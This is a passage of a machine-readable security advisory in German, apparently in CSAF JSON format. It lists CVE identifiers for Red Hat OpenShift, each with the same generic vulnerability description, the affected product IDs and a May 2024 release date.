"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52580"
},
{
"cve": "CVE-2023-52581",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52581"
},
{
"cve": "CVE-2023-52597",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52597"
},
{
"cve": "CVE-2023-52610",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52610"
},
{
"cve": "CVE-2023-52620",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-52620"
},
{
"cve": "CVE-2023-5678",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-5678"
},
{
"cve": "CVE-2023-6040",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6040"
},
{
"cve": "CVE-2023-6121",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6121"
},
{
"cve": "CVE-2023-6129",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6129"
},
{
"cve": "CVE-2023-6176",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6176"
},
{
"cve": "CVE-2023-6228",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6228"
},
{
"cve": "CVE-2023-6237",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6237"
},
{
"cve": "CVE-2023-6240",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6240"
},
{
"cve": "CVE-2023-6531",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6531"
},
{
"cve": "CVE-2023-6546",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6546"
},
{
"cve": "CVE-2023-6622",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6622"
},
{
"cve": "CVE-2023-6915",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6915"
},
{
"cve": "CVE-2023-6931",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6931"
},
{
"cve": "CVE-2023-6932",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-6932"
},
{
"cve": "CVE-2023-7008",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2023-7008"
},
{
"cve": "CVE-2024-0565",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-0565"
},
{
"cve": "CVE-2024-0727",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-0727"
},
{
"cve": "CVE-2024-0841",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-0841"
},
{
"cve": "CVE-2024-1085",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-1085"
},
{
"cve": "CVE-2024-1086",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-1086"
},
{
"cve": "CVE-2024-1394",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-1394"
},
{
"cve": "CVE-2024-1488",
"notes": [
{
"category": "description",
"text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T035679",
"T037618",
"T036959",
"T038901",
"67646",
"T035034",
"T036993",
"T037940",
"T035142",
"T035698",
"T032255",
"T035047",
"T035036",
"T035431",
"T027759",
"T033270",
"T000126",
"398363"
]
},
"release_date": "2024-05-22T22:00:00.000+00:00",
"title": "CVE-2024-1488"
},
{
"cve": "CVE-2024-21011",
"notes": [
{
"category": "description",
